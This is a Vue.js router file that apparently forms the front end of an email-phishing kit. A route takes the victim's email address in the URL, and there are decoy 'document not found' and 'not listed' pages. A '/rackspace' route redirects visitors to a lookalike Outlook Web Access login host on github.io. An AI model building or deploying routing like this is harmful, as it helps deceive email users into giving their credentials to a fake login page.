import Vue from 'vue';
import VueRouter from 'vue-router';
import Home from '../views/Home.vue';
Vue.use(VueRouter);

const routes = [
  {
    path: '/login/mail/:email',
    name: 'Home',
    component: Home,
  },
  {
    path: '/document-not-found',
    name: 'DocumentNotFound',
    component: () =>
      import(/* webpackChunkName: "about" */ '../views/DocumentNotFound.vue'),
  },
  {
    path: '/not-listed',
    name: 'NotListed',
    component: () =>
      import(/* webpackChunkName: "about" */ '../views/NotListed.vue'),
  },
  {
    path: '/success',
    name: 'success',
    component: () =>
      import(/* webpackChunkName: "about" */ '../views/success.vue'),
  },
  {
    path: '/rackspace',
    name: 'rackspace',
    beforeEnter() {
      location.href = 'https://owa-login-auth.github.io/rackspace-meeting.html';
    },
    component: () =>
      import(/* webpackChunkName: "about" */ '../views/success.vue'),
  },
];

const router = new VueRouter({
  routes,
});

export default router;
